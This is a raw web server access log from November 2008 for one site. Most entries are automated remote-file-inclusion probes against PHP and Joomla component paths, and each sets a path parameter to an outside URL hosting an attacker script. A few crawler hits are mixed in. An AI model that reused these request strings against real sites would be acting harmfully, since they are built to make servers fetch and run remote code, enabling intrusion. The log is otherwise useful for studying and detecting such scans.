78.13.48.145 - - [04/Nov/2008:10:54:32 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
78.13.48.145 - - [04/Nov/2008:10:54:32 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:10:54:37 -0800] "GET /logs/access_080127.log//convert/mvcw_conver.php?step=1&vwar_root=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:10:54:37 -0800] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:10:54:47 -0800] "GET /logs//inc/download_center_lite.inc.php?script_root=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:10:54:47 -0800] "GET /inc/download_center_lite.inc.php?script_root=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:10:54:55 -0800] "GET /logs/access_080727.log//adminhead.php?path[docroot]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:10:55:18 -0800] "GET /inc/download_center_lite.inc.php?script_root=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:10:55:18 -0800] "GET /logs//inc/download_center_lite.inc.php?script_root=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:10:55:28 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.56.6 - - [04/Nov/2008:10:55:31 -0800] "GET /logs/access_080209.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.6 - - [04/Nov/2008:10:55:32 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.6 - - [04/Nov/2008:10:55:32 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.6 - - [04/Nov/2008:10:55:32 -0800] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:10:55:59 -0800] "GET /logs/access_080209.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:10:55:59 -0800] "GET /logs/access_080209.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:10:56:00 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:10:56:00 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:10:56:01 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:10:56:01 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:10:56:04 -0800] "GET /logs/access_080111.log//convert/mvcw_conver.php?step=1&vwar_root=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:10:56:10 -0800] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:10:56:10 -0800] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:56:13 -0800] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:56:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:10:56:17 -0800] "GET /logs/access_080505.log//index.php?screen=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:10:56:17 -0800] "GET /logs/access_080908.log//index.php?screen=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:10:56:17 -0800] "GET /logs//index.php?screen=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:10:56:18 -0800] "GET /index.php?screen=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 94637 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:56:31 -0800] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.186.3.220 - - [04/Nov/2008:10:56:44 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kukesii.t35.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
91.186.3.220 - - [04/Nov/2008:10:56:44 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kukesii.t35.com/ids.txt??? HTTP/1.1" 200 95296 "-" "libwww-perl/5.814" "www.dmulk.com"
66.28.139.42 - - [04/Nov/2008:10:56:52 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.28.139.42 - - [04/Nov/2008:10:56:52 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:56:54 -0800] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:56:54 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:56:55 -0800] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:10:57:02 -0800] "GET /logs//inc/download_center_lite.inc.php?script_root=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:10:57:02 -0800] "GET /inc/download_center_lite.inc.php?script_root=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.186.3.220 - - [04/Nov/2008:10:57:07 -0800] "GET /logs/access_080517.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kukesii.t35.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
65.55.211.23 - - [04/Nov/2008:10:57:07 -0800] "GET /?show=slide&pageid=159&nggpage=8 HTTP/1.1" 200 149604 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:10:57:10 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:10:57:10 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.186.3.220 - - [04/Nov/2008:10:57:12 -0800] "GET /logs/access_080216.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kukesii.t35.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
69.94.56.6 - - [04/Nov/2008:10:57:31 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.6 - - [04/Nov/2008:10:57:32 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:10:57:36 -0800] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:10:57:36 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:10:57:37 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:57:39 -0800] "GET /logs/access_080918.log/classes/core/language.php?rootdir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:57:39 -0800] "GET /logs/classes/core/language.php?rootdir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:10:57:54 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:10:58:32 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:10:58:32 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:10:58:40 -0800] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:10:58:49 -0800] "GET /logs//inc/download_center_lite.inc.php?script_root=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:10:58:49 -0800] "GET /inc/download_center_lite.inc.php?script_root=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:58:51 -0800] "GET /logs/access_080401.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.28.139.42 - - [04/Nov/2008:10:59:03 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.28.139.42 - - [04/Nov/2008:10:59:04 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.56.6 - - [04/Nov/2008:10:59:08 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:59:27 -0800] "GET /logs/classes/core/language.php?rootdir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:59:27 -0800] "GET /logs/access_080918.log/classes/core/language.php?rootdir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:59:36 -0800] "GET /logs/access_080330.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:10:59:38 -0800] "GET /logs/access_080913.log/classes/core/language.php?rootdir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:11:00:06 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:11:00:06 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:00:08 -0800] "GET /logs/classes/core/language.php?rootdir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:00:08 -0800] "GET /logs/access_080918.log/classes/core/language.php?rootdir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:11:00:08 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:11:00:08 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:11:00:13 -0800] "GET /logs/access_080418.log/com_expose&Itemid=//////////?mosConfig_absolute_path=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:11:00:13 -0800] "GET /com_expose&Itemid=//////////?mosConfig_absolute_path=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:11:00:14 -0800] "GET /logs/com_expose&Itemid=//////////?mosConfig_absolute_path=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:00:14 -0800] "GET /logs/access_080913.log/classes/core/language.php?rootdir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.52 - - [04/Nov/2008:11:00:17 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.maxscan.org/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.133.52 - - [04/Nov/2008:11:00:17 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.maxscan.org/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.133.52 - - [04/Nov/2008:11:00:17 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.maxscan.org/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:11:00:19 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.133.52 - - [04/Nov/2008:11:00:22 -0800] "GET /logs/access_080331.log//skin/zero_vote/ask_password.php?dir=http://www.maxscan.org/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:00:22 -0800] "GET /logs/classes/core/language.php?rootdir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:00:22 -0800] "GET /logs/access_080918.log/classes/core/language.php?rootdir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:00:28 -0800] "GET /logs/access_080913.log/classes/core/language.php?rootdir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.184 - - [04/Nov/2008:11:00:50 -0800] "GET /logs/access_080216.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geeklinuxer.co.cc/data/Gang11/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [04/Nov/2008:11:00:52 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geeklinuxer.co.cc/data/Gang11/id? HTTP/1.1" 200 95345 "-" "libwww-perl/5.79" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:00:54 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:00:54 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
218.239.45.184 - - [04/Nov/2008:11:00:54 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geeklinuxer.co.cc/data/Gang11/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:00:55 -0800] "GET /index.php?DOCUMENT_ROOT=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 94686 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:00:57 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:11:01:10 -0800] "GET /index.php?p=http://dld.go.th/info.txt? HTTP/1.1" 200 94518 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:01:42 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:01:42 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:02:50 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:02:51 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:02:52 -0800] "GET /index.php?DOCUMENT_ROOT=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 94686 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:03:21 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:11:04:05 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:11:04:05 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:11:04:06 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:11:04:07 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:04:39 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:04:39 -0800] "GET /index.php?DOCUMENT_ROOT=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 94702 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:04:40 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:05:20 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
80.13.217.217 - - [04/Nov/2008:11:05:37 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:05:46 -0800] "GET /logs/access_080831.log/inc.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:05:46 -0800] "GET /inc.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:05:46 -0800] "GET /logs/inc.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:05:54 -0800] "GET /logs/access_080827.log/inc.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:11:06:15 -0800] "GET /bikes/dteel/2008_09_14/?N=D HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
